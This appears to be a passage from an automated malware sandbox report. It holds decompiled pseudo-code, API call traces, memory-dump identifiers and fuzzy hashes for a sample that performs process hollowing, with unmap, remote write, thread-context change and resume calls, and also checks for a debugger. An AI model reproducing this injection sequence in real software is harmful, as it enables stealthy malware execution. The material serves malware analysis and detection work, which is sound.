              				_t11 = L0040138D(0xeb, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, 0xeb, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t21 = 0x5c;
              				return L0040113B(_t13, _t17, _t21, _t23, _t25, _t31);
              			}

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: b4b0a9984882ff5f2b6faabf12f6e8ec5eae452e92f205c2972abf1b7a202191
              • Instruction ID: 04e1208274e68be980b74980f77298c45205cb64358d3d7bc66da16523479b8c
              • Opcode Fuzzy Hash: b4b0a9984882ff5f2b6faabf12f6e8ec5eae452e92f205c2972abf1b7a202191
              • Instruction Fuzzy Hash: E5F03677604205FAEF007FE19C41EAA3728DF08759F248537BA12B80F1D5388612A72E
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              C-Code - Quality: 57%
              			E0040202C(char __eax, signed int __edi, signed int __esi, void* __eflags) {
              				char _t23;
              				intOrPtr _t31;
              				signed char _t38;
              				signed char _t41;
              				signed int _t42;
              				signed int _t44;
              				signed char _t46;
              				signed char _t51;
              				signed char _t54;
              				signed char _t62;
              				void* _t69;
              				signed int _t80;
              
              				_t44 = __esi;
              				_t42 = __edi;
              				_t23 = __eax;
              				_t32 = 0x14;
              				asm("sbb eax, ebp");
              				_t38 = _t51;
              				if(__eflags < 0) {
              					L1:
              					asm("sbb dh, [ebx+0x4c4cecdf]");
              					asm("iretd");
              					 *((char*)(_t38 + _t38 * 8 - 0x74)) = _t23;
              					_t51 = _t46;
              					asm("invalid");
              					_t44 = _t44 + 1;
              					asm("adc ecx, [ebx+0x4c4cb009]");
              					L3:
              					 *(_t23 + 0x4c4c4c4c) =  *(_t23 + 0x4c4c4c4c) | _t44;
              					asm("cmpsd");
              					_t38 = _t38 + 1;
              					asm("iretd");
              					_t46 =  *(_t42 - 0x6f);
              					asm("adc ecx, [edi+0x73]");
              					asm("movsd");
              					asm("pushfd");
              					L5:
              					asm("rcr dword [ecx], 0xb4");
              					_t42 = _t42 + 1;
              					asm("enter 0x4c4c, 0x4c");
              					asm("int 0x9");
              					_t54 = ds;
              					_t51 = _t54;
              					_t32 = 0x39;
              					_t23 = 0xb7;
              					_t69 = 0xb7;
              					_pop(ds);
              				}
              				if(_t69 == 0) {
              					goto L3;
              				}
              				 *(_t23 + 0x1eb419c1) =  *(_t23 + 0x1eb419c1) | _t42;
              				while(1) {
              					L8:
              					asm("sbb [esi+ebx-0x4c4bc64d], esi");
              					asm("enter 0x4c4c, 0x4c");
              					_t51 = _t46;
              					_pop(_t46);
              					asm("invalid");
              					if( *((intOrPtr*)(_t23 - 0x204cb8da)) >= _t42) {
              						goto L5;
              					}
              					 *(_t23 - 0x45368439) =  *(_t23 - 0x45368439) ^ _t42;
              					_t38 = _t38 ^  *(_t23 - 0x37);
              					_push(_t23);
              					if(_t38 >= 0) {
              						goto L1;
              					}
              					_t41 = 0xbc16138 +  *((intOrPtr*)(_t44 + 0x4d));
              					if((_t23 - _t32 & _t38) != 0) {
              						_pop(ds);
              						asm("movsb");
              						_t41 = _t41 ^  *(_t42 - 0x73364c4d);
              						L12:
              						asm("invalid");
              						while(1) {
              							_t38 =  *_t38;
              							asm("cmpsd");
              							asm("int 0x8b");
              							_push(0x4c);
              							_t46 = _t46 + 2 - 1;
              							_t62 = _t51 - 0xfffffffffffffffd;
              							_t23 = 0x4c +  *((intOrPtr*)(_t42 - 0x47c64c7d));
              							_t32 = 0x1f;
              							if(_t23 < 0) {
              								goto L8;
              							}
              							_push(_t41);
              							_t51 = _t62;
              							asm("adc al, 0xa7");
              							_t38 = _t38 - 1;
              							if(_t38 == 0) {
              								continue;
              							} else {
              								asm("cmpsd");
              								_t46 = _t46 - 1;
              								asm("lds esp, [ecx+ebp*2]");
              								_t44 = _t44 - 1;
              								_t80 = _t44;
              								_t51 = _t51;
              								asm("adc eax, 0xa95949a7");
              								asm("cmpsd");
              							}
              							goto L16;
              						}
              						continue;
              					}
              					L16:
              					if(_t80 >= 0) {
              						goto L12;
              					}
              					_t31 =  *((intOrPtr*)(_t46 - 4));
              					return _t31;
              				}
              				goto L5;
              			}

              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fbabc42fb16564f7cbcb1c556b6a87cc50b5c42c687b1a9ef82ddbbf6acab553
              • Instruction ID: a8a887d8135cfffa22a9d8b74fa84127aed7572815cebf71017f25ce6cebea50
              • Opcode Fuzzy Hash: fbabc42fb16564f7cbcb1c556b6a87cc50b5c42c687b1a9ef82ddbbf6acab553
              • Instruction Fuzzy Hash: 2921E0B9A12A44CFCB28CB649B461E1B7A0FE6230075551DFC1529B7B1CA618883CFD7
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 50%
              			E00402052(char __eax, signed char __ecx, signed int __edi, signed int __esi) {
              				char _t23;
              				intOrPtr _t31;
              				signed char _t38;
              				signed char _t40;
              				signed int _t41;
              				signed int _t43;
              				intOrPtr _t45;
              				intOrPtr _t46;
              				intOrPtr _t53;
              				intOrPtr _t56;
              				intOrPtr _t62;
              				signed int _t79;
              
              				L0:
              				while(1) {
              					L0:
              					_t43 = __esi;
              					_t41 = __edi;
              					_t38 = __ecx;
              					_t23 = __eax;
              					_t45 =  *((intOrPtr*)(__edi - 0x6f));
              					asm("adc ecx, [edi+0x73]");
              					asm("movsd");
              					asm("pushfd");
              					while(1) {
              						L4:
              						asm("rcr dword [ecx], 0xb4");
              						_t41 = _t41 + 1;
              						asm("enter 0x4c4c, 0x4c");
              						asm("int 0x9");
              						_t56 = ds;
              						_t53 = _t56;
              						_t34 = 0x39;
              						_t23 = 0xb7;
              						_pop(ds);
              						L5:
              						if(0xb7 == 0) {
              							L3:
              							 *(_t23 + 0x4c4c4c4c) =  *(_t23 + 0x4c4c4c4c) | _t43;
              							asm("cmpsd");
              							_t38 = _t38 + 1;
              							asm("iretd");
              							goto L0;
              						}
              						L6:
              						 *0x1EB41A78 =  *0x1EB41A78 | _t41;
              						while(1) {
              							L7:
              							asm("sbb [esi+ebx-0x4c4bc64d], esi");
              							asm("enter 0x4c4c, 0x4c");
              							_t53 = _t46;
              							_pop(_t46);
              							asm("invalid");
              							if( *((intOrPtr*)(_t23 - 0x204cb8da)) >= _t41) {
              								break;
              							}
              							L8:
              							 *(_t23 - 0x45368439) =  *(_t23 - 0x45368439) ^ _t41;
              							_t38 = _t38 ^  *(_t23 - 0x37);
              							_push(_t23);
              							if(_t38 >= 0) {
              								L1:
              								asm("sbb dh, [ebx+0x4c4cecdf]");
              								asm("iretd");
              								 *((char*)(_t38 + _t38 * 8 - 0x74)) = _t23;
              								L2:
              								_t53 = _t45;
              								_pop(_t46);
              								asm("invalid");
              								_t43 = _t43 + 1;
              								asm("adc ecx, [ebx+0x4c4cb009]");
              								goto L3;
              							}
              							L9:
              							_t40 = 0xbc16138 +  *((intOrPtr*)(_t43 + 0x4d));
              							if((_t23 - _t34 & _t38) != 0) {
              								L10:
              								_pop(ds);
              								asm("movsb");
              								_t40 = _t40 ^  *(_t41 - 0x73364c4d);
              								L11:
              								asm("invalid");
              								while(1) {
              									L12:
              									_t38 =  *_t38;
              									asm("cmpsd");
              									asm("int 0x8b");
              									_push(0x4c);
              									_t46 = _t46 + 2 - 1;
              									_t62 = _t53 - 0xfffffffffffffffd;
              									_t23 = 0x4c +  *((intOrPtr*)(_t41 - 0x47c64c7d));
              									_t34 = 0x1f;
              									if(_t23 < 0) {
              										goto L7;
              									}
              									L13:
              									_push(_t40);
              									_t53 = _t62;
              									asm("adc al, 0xa7");
              									_t38 = _t38 - 1;
              									if(_t38 == 0) {
              										continue;
              									} else {
              										L14:
              										asm("cmpsd");
              										_t46 = _t46 - 1;
              										asm("lds esp, [ecx+ebp*2]");
              										_t43 = _t43 - 1;
              										_t79 = _t43;
              										_t53 = _t53;
              										asm("adc eax, 0xa95949a7");
              										asm("cmpsd");
              									}
              									goto L15;
              								}
              								continue;
              							}
              							L15:
              							if(_t79 >= 0) {
              								goto L11;
              							}
              							L16:
              							_t31 =  *((intOrPtr*)(_t46 - 4));
              							L17:
              							return _t31;
              							L18:
              						}
              						L4:
              						asm("rcr dword [ecx], 0xb4");
              						_t41 = _t41 + 1;
              						asm("enter 0x4c4c, 0x4c");
              						asm("int 0x9");
              						_t56 = ds;
              						_t53 = _t56;
              						_t34 = 0x39;
              						_t23 = 0xb7;
              						_pop(ds);
              						goto L5;
              					}
              				}
              			}

              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 582d09d55ad77c1e7aeb8d300c24ad101f826c757ddfc10a404fb46e83914ed8
              • Instruction ID: c83445de43d01cce4181a3408f6f95faafacb7355a4cde8baead310d89bed673
              • Opcode Fuzzy Hash: 582d09d55ad77c1e7aeb8d300c24ad101f826c757ddfc10a404fb46e83914ed8
              • Instruction Fuzzy Hash: A221CCB8A02A04CFC625CB649A891D2F7A0FE62304B18519BC1525BB71D2754883CFE7
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 27%
              			E00402403(void* __ecx, void* __edx, signed int __edi, void* __fp0) {
              				signed char _t42;
              				signed int _t44;
              				signed int _t65;
              				signed int _t70;
              				void* _t72;
              				signed int _t74;
              
              				L0:
              				while(1) {
              					L0:
              					_t42 =  *0xcf0a384c;
              					 *(_t42 - 0x5fc64cb2) =  *(_t42 - 0x5fc64cb2) | _t74;
              					_pop(ds);
              					if((_t42 | 0x000000b3) != 0) {
              						break;
              					}
              					L1:
              					_t44 =  *0xc73f384c;
              					 *(_t44 - 0x3aa7f339) =  *(_t44 - 0x3aa7f339) | __edi;
              					 *(_t70 + __edi * 2 - 0x4bce884d) =  *(_t70 + __edi * 2 - 0x4bce884d) | _t65;
              					asm("aas");
              					asm("das");
              					asm("rcr dword [ecx], 0xa0");
              					_push(ds);
              					asm("sbb esi, [ebx-0x204c57c7]");
              					asm("iretd");
              					 *(_t44 - 0x30f5c7b4) =  *(_t44 - 0x30f5c7b4) ^ _t74 - 0xffffffffffffffff;
              				}
              				L2:
              				 *(__ecx + _t44 * 8 - 0x4ce15fe7) =  *(__ecx + _t44 * 8 - 0x4ce15fe7) | __edi;
              				asm("sbb esi, [ebx-0x204c57c7]");
              				asm("invalid");
              				asm("iretd");
              				 *(_t44 - 0x38a2c7b4) =  *(_t44 - 0x38a2c7b4) ^ _t70;
              				 *(__ecx + 0x1f1c5c0c +  *0xc75d384c * 8) =  *(__ecx + 0x1f1c5c0c +  *0xc75d384c * 8) | __edi;
              				asm("movsb");
              				_pop(_t72);
              				asm("invalid");
              				asm("es movsd");
              				asm("cmpsd");
              				asm("adc dh, bh");
              				asm("pushad");
              				asm("frstor [ebx+ebx*2]");
              				asm("outsb");
              				asm("adc al, 0xa7");
              				asm("sbb ebx, [edx]");
              				asm("cmpsd");
              				asm("in al, dx");
              				 *0xFFFFFFFFA45EA814 = 0xa74888cf;
              				asm("cmpsb");
              				asm("int3");
              				asm("cmpsd");
              				 *0xa0d5a4bf = 0x84;
              				return  *((intOrPtr*)(_t72 - 4));
              			}

              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fb2763b50332117d4cd38ebd3a92fb9766fda1add63ad4ca90e9e0cadc5d9c26
              • Instruction ID: 0f27eaa69be10ba5d10042c069f8084f082d4262394f61c98c3ff60c1b4368df
              • Opcode Fuzzy Hash: fb2763b50332117d4cd38ebd3a92fb9766fda1add63ad4ca90e9e0cadc5d9c26
              • Instruction Fuzzy Hash: 61F0E932905640DFC705CF10F50748477B4FE4170172255DAC4D256971CB3691E3CF86
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 25%
              			E004023D9(void* __ecx, void* __edx, signed int __edi, signed int __esi, void* __fp0) {
              				intOrPtr _t42;
              				signed char _t43;
              				signed int _t44;
              				signed int _t70;
              				void* _t72;
              				void* _t74;
              				signed int _t77;
              
              				do {
              					_t42 =  *0xc73f384c;
              					 *(_t42 - 0x3aa7f339) =  *(_t42 - 0x3aa7f339) | __edi;
              					 *(_t70 + __edi * 2 - 0x4bce884d) =  *(_t70 + __edi * 2 - 0x4bce884d) | __esi;
              					asm("aas");
              					asm("das");
              					asm("rcr dword [ecx], 0xa0");
              					_t77 = _t74 - 0xffffffffffffffff;
              					asm("sbb esi, [ebx-0x204c57c7]");
              					asm("iretd");
              					 *(_t42 - 0x30f5c7b4) =  *(_t42 - 0x30f5c7b4) ^ _t77;
              					_t43 =  *0xcf0a384c;
              					 *(_t43 - 0x5fc64cb2) =  *(_t43 - 0x5fc64cb2) | _t77;
              					_t44 = _t43 | 0x000000b3;
              					ds = ds;
              				} while (_t44 == 0);
              				 *(__ecx + _t44 * 8 - 0x4ce15fe7) =  *(__ecx + _t44 * 8 - 0x4ce15fe7) | __edi;
              				asm("sbb esi, [ebx-0x204c57c7]");
              				asm("invalid");
              				asm("iretd");
              				 *(_t44 - 0x38a2c7b4) =  *(_t44 - 0x38a2c7b4) ^ _t70;
              				 *(__ecx + 0x1f1c5c0c +  *0xc75d384c * 8) =  *(__ecx + 0x1f1c5c0c +  *0xc75d384c * 8) | __edi;
              				asm("movsb");
              				_pop(_t72);
              				asm("invalid");
              				asm("es movsd");
              				asm("cmpsd");
              				asm("adc dh, bh");
              				asm("pushad");
              				asm("frstor [ebx+ebx*2]");
              				asm("outsb");
              				asm("adc al, 0xa7");
              				asm("sbb ebx, [edx]");
              				asm("cmpsd");
              				asm("in al, dx");
              				 *0xFFFFFFFFA45EA814 = 0xa74888cf;
              				asm("cmpsb");
              				asm("int3");
              				asm("cmpsd");
              				 *0xa0d5a4bf = 0x84;
              				return  *((intOrPtr*)(_t72 - 4));
              			}

              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6ee4aad523619d2523866d80873a575c389a27590689aa6c2f41782ac6c4a352
              • Instruction ID: df714e191690ec59b59deb9f1aa5729172ce7cf2683613fe6c18e08e4d69e8fc
              • Opcode Fuzzy Hash: 6ee4aad523619d2523866d80873a575c389a27590689aa6c2f41782ac6c4a352
              • Instruction Fuzzy Hash: 90D0A732E05A51DFC7059F20FC430887BB5EA40B00701838AC8E1568B1C73561A2CFC6
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              APIs
              • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 01D20156
              • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 01D2016C
              • CreateProcessA.KERNELBASE(?,00000000), ref: 01D20255
              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 01D20270
              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 01D20283
              • GetThreadContext.KERNELBASE(00000000,?), ref: 01D2029F
              • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 01D202C8
              • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 01D202E3
              • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 01D20304
              • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 01D2032A
              • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 01D20399
              • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 01D203BF
              • SetThreadContext.KERNELBASE(00000000,?), ref: 01D203E1
              • ResumeThread.KERNELBASE(00000000), ref: 01D203ED
              • ExitProcess.KERNEL32(00000000), ref: 01D20412
              Memory Dump Source
              • Source File: 00000004.00000002.820682255.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
              Similarity
              • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
              • String ID:
              • API String ID: 2875986403-0
              • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
              • Instruction ID: 3fe0124d9a1a6742bd082d81542a47e134f55fdd4879c2b0c20961289796e2b2
              • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
              • Instruction Fuzzy Hash: 82B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E549AB391D771AE41CF94
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 01D20533
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.820682255.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
              Similarity
              • API ID: CreateWindow
              • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
              • API String ID: 716092398-2341455598
              • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
              • Instruction ID: eee8c0879424a9044b812e30220668e2de2e10547ec9e59fffd905a6911b075e
              • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
              • Instruction Fuzzy Hash: 6A511B70D08388DAEB11CBD8C849BDDBFB2AF25708F144098E5447F2C6C3BA5559CB65
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileAttributesA.KERNELBASE(apfHQ), ref: 01D205EC
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.820682255.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
              Similarity
              • API ID: AttributesFile
              • String ID: apfHQ$o
              • API String ID: 3188754299-2999369273
              • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
              • Instruction ID: 6c6a95da3c2360f999bde34dec48a35e4ae6ce6d43808e87d1fd6068a8ed770f
              • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
              • Instruction Fuzzy Hash: ED015E70C0425CEFDF10DB98C4583AEBFB5AF51309F148099D4192B341D7B69B58CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • Module32First.KERNEL32(00000000,00000224), ref: 01F1DE15
              Memory Dump Source
              • Source File: 00000004.00000002.820832478.0000000001F19000.00000040.00000001.sdmp, Offset: 01F19000, based on PE: false
              Similarity
              • API ID: FirstModule32
              • String ID:
              • API String ID: 3757679902-0
              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
              • Instruction ID: d7e6d39645839e8ee6bf0f87ed098ba5dbfe39951266091621a8973b6b286a6c
              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
              • Instruction Fuzzy Hash: 88F09632600711ABE7203BFDAC8DB6F76F8EF49625F140668E642914C4DB72E8458B61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RtlEncodePointer.NTDLL(00000000,?,0041854B,?,?,0041B870), ref: 0041B707
              Memory Dump Source
              • Source File: 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.820415652.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.820493693.0000000000432000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.820642346.0000000001BE7000.00000002.00020000.sdmp
              Similarity
              • API ID: EncodePointer
              • String ID:
              • API String ID: 2118026453-0
              • Opcode ID: 9959ae12a63e7be41ee1249dc23bfeec2a60edfea2c01f2fa9bd04385b4242a5
              • Instruction ID: fff4fc13f331173d5f44345ba5de76c3d217d84afd66244667499e79857a9d4f
              • Opcode Fuzzy Hash: 9959ae12a63e7be41ee1249dc23bfeec2a60edfea2c01f2fa9bd04385b4242a5
              • Instruction Fuzzy Hash: 7EA0223208830CB3E20023C3BE0EF8A3F0CC3C0B32F000030FA0C028A00EB2B80080AA
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			_entry_() {
              				void* _t3;
              
              				E00417F30(); // executed
              				return L00417C40(_t3);
              			}

              APIs
              • ___security_init_cookie.LIBCMTD ref: 00417C25
              Memory Dump Source
              • Source File: 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.820415652.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.820493693.0000000000432000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.820642346.0000000001BE7000.00000002.00020000.sdmp
              Similarity
              • API ID: ___security_init_cookie
              • String ID:
              • API String ID: 3657697845-0
              • Opcode ID: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
              • Instruction ID: 75362f7300f174ec655b47ac61f3a362e1bc62a5ad9bc88d6b2dcc2f719078ed
              • Opcode Fuzzy Hash: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
              • Instruction Fuzzy Hash: DBA002310AC64816015433A7450798B756E4BC0718795105BB5590210B2C5CA8C280EE
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 01F1DADD
              Memory Dump Source
              • Source File: 00000004.00000002.820832478.0000000001F19000.00000040.00000001.sdmp, Offset: 01F19000, based on PE: false
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
              • Instruction ID: b19973d3e4ad382eab766410a0173996800e7c019aed0b5dc67676232c7268c8
              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
              • Instruction Fuzzy Hash: A7113C79A00208EFDB01DF98C989E98BFF5AF08351F098094F9489B361D371EA50DF90
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              C-Code - Quality: 85%
              			E0041FDD0(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
              				intOrPtr _v0;
              				void* _v804;
              				intOrPtr _v808;
              				intOrPtr _v812;
              				intOrPtr _t6;
              				intOrPtr _t11;
              				long _t15;
              				intOrPtr _t19;
              				intOrPtr _t20;
              				intOrPtr _t21;
              				intOrPtr _t22;
              				intOrPtr _t23;
              				intOrPtr _t24;
              				intOrPtr _t25;
              				intOrPtr* _t29;
              				void* _t34;
              
              				_t25 = __esi;
              				_t24 = __edi;
              				_t22 = __edx;
              				_t20 = __ecx;
              				_t19 = __ebx;
              				_t6 = __eax;
              				_t34 = _t20 -  *0x432064; // 0xb758e270
              				if(_t34 == 0) {
              					asm("repe ret");
              				}
              				 *0x433b68 = _t6;
              				 *0x433b64 = _t20;
              				 *0x433b60 = _t22;
              				 *0x433b5c = _t19;
              				 *0x433b58 = _t25;
              				 *0x433b54 = _t24;
              				 *0x433b80 = ss;
              				 *0x433b74 = cs;
              				 *0x433b50 = ds;
              				 *0x433b4c = es;
              				 *0x433b48 = fs;
              				 *0x433b44 = gs;
              				asm("pushfd");
              				_pop( *0x433b78);
              				 *0x433b6c =  *_t29;
              				 *0x433b70 = _v0;
              				 *0x433b7c =  &_a4;
              				 *0x433ab8 = 0x10001;
              				_t11 =  *0x433b70; // 0x0
              				 *0x433a6c = _t11;
              				 *0x433a60 = 0xc0000409;
              				 *0x433a64 = 1;
              				_t21 =  *0x432064; // 0xb758e270
              				_v812 = _t21;
              				_t23 =  *0x432068; // 0x48a71d8f
              				_v808 = _t23;
              				 *0x433ab0 = IsDebuggerPresent();
              				_push(1);
              				E0041F220(_t12);
              				SetUnhandledExceptionFilter(0);
              				_t15 = UnhandledExceptionFilter("`:C");
              				if( *0x433ab0 == 0) {
              					_push(1);
              					E0041F220(_t15);
              				}
              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
              			}

              APIs
              • IsDebuggerPresent.KERNEL32 ref: 0042454D
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00424564
              • UnhandledExceptionFilter.KERNEL32(`:C), ref: 0042456F
              • GetCurrentProcess.KERNEL32(C0000409), ref: 0042458D
              • TerminateProcess.KERNEL32(00000000), ref: 00424594
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.820415652.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.820493693.0000000000432000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.820642346.0000000001BE7000.00000002.00020000.sdmp
              Similarity
              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
              • String ID: `:C
              • API String ID: 2579439406-2112543841
              • Opcode ID: 5f07c0ba91c4a311d966236a698771f1edd427859634f51a4b477b8fe04c93ae
              • Instruction ID: df30baf3a4553619d861d5c5530e1938f48ef394fcdc49e22dd6aa407c5cc3c4
              • Opcode Fuzzy Hash: 5f07c0ba91c4a311d966236a698771f1edd427859634f51a4b477b8fe04c93ae
              • Instruction Fuzzy Hash: 0921C0B8904304EBE714EF69F944644BBA4FB08316F10217AEA0993772E7796689CF4D
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000004.00000002.820832478.0000000001F19000.00000040.00000001.sdmp, Offset: 01F19000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
              • Instruction ID: 0d2ac3d19d4c792fcd7c5100d917c2e1d0d76f473c35f79ea6405b3bb2770ec0
              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
              • Instruction Fuzzy Hash: 1411A5733401019FD744DF99DCD4FA673EAEB89360B198065ED08CB319D676E802C760
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000004.00000002.820682255.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
              • Instruction ID: ea11536aa9e207517ac4e09317ff52d21c6b9bacb836c8ea27d39ac4b5709d32
              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
              • Instruction Fuzzy Hash: 1B11CE72340120AFEB14CF69DCD0FA273EAFB98224B198065ED18CB311D67AE801C760
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              C-Code - Quality: 100%
              			E00401812(void* __edx) {
              				void* _t4;
              
              				 *((intOrPtr*)(_t4 - 0x77)) =  *((intOrPtr*)(_t4 - 0x77)) + __edx;
              			}

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: a9242262985629b7ba65b23d5e149a247a5822ccc711938d973886dc562d5c51
              • Instruction ID: 66c4bf53945efb9eac17a29b63d6e60a7dc9cc17017cfcbb6067bf93f0ee6b10
              • Opcode Fuzzy Hash: a9242262985629b7ba65b23d5e149a247a5822ccc711938d973886dc562d5c51
              • Instruction Fuzzy Hash: EC011277548205EBEB007AA59C41AAA37289B05754F34C537FA12B80F1D67D8713A71F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 70%
              			E00401813(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
              				char _v8;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t8;
              				void* _t11;
              				void* _t13;
              				void* _t16;
              				intOrPtr* _t17;
              				void* _t19;
              				void* _t20;
              				void* _t21;
              				void* _t22;
              				intOrPtr* _t23;
              
              				_t25 = __eflags;
              				_push(0x184c);
              				_t8 =  *_t23;
              				L0040113B(_t8, _t16, 0x5c, _t21, _t22, __eflags);
              				_t17 = _a4;
              				Sleep(0x1388);
              				_t11 = L0040138D(_t20, _t25, _t17, _a8, _a12,  &_v8); // executed
              				_t26 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t20, _t21, _t22, _t26, _t17, _t11, _v8, _a16); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t19 = 0x5c;
